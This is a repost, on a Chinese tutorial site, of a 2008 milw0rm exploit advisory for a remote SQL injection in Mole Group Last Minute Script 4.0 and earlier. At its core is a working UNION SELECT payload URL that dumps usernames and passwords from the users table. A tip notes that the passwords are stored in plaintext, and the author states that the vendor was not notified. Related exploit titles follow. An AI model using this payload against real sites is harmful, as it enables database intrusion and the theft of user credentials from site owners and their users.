手机
当前位置:查字典教程网 >网络安全 >Exploit >Mole Group Last Minute Script
Mole Group Last Minute Script
摘要:-[*]==================================================================...

-[*] ================================================================================ [*]-

-[*] Last Minute Script <= 4.0 Remote SQL Injection Vulnerability [*]-

-[*] ================================================================================ [*]-

[*] Discovered By: t0pP8uZz

[*] Discovered On: 8 JULY 2008

[*] Script Download: http://www.mole-group.com/content/view/31/45/

[*] DORK: N/A

[*] Vendor Has Not Been Notified!

[*] DESCRIPTION:

Last Minute Script 4.0 (and all prior versions) suffer from a multirow SQL injection flaw,

This allows the remote attacker to execute arbitrary MySQL querys, and possibly gaining access

to confidential information.

below is a example.

[*] SQL Injection:

http://site.com/index.php?cid=-1/**/UNION/**/ALL/**/SELECT/**/CONVERT(CONCAT(name,0x3a,password,0x3C62723E)/**/using/**/latin1),2,3,4/**/FROM/**/users/*

[*] NOTE/TIP:

passwords are in plaintext.

There are also other SQL injections around the site which i have found, So no one even bother to post has seperate vulns.

[*] GREETZ:

milw0rm.com, h4ck-y0u.org, Offensive-Security.com, CipherCrew !

[-] Peace...

...t0pP8uZz !

-[*] ================================================================================ [*]-

-[*] Last Minute Script <= 4.0 Remote SQL Injection Vulnerability [*]-

-[*] ================================================================================ [*]-

# milw0rm.com [2008-07-08]

【Mole Group Last Minute Script】相关文章:

Maian Search

Sun xVM VirtualBox

Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit

Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit

MS Windows (.doc File) Malformed Pointers Denial of Service Exploit

MS Windows (MessageBox) Memory Corruption Local Denial of Service

LoveCMS 1.6.2 Final Remote Code Execution Exploit

iGaming CMS

MojoClassifieds 2.0 Remote Blind SQL Injection Exploit

LoveCMS 1.6.2 Final Update Settings Remote Exploit

精品推荐
分类导航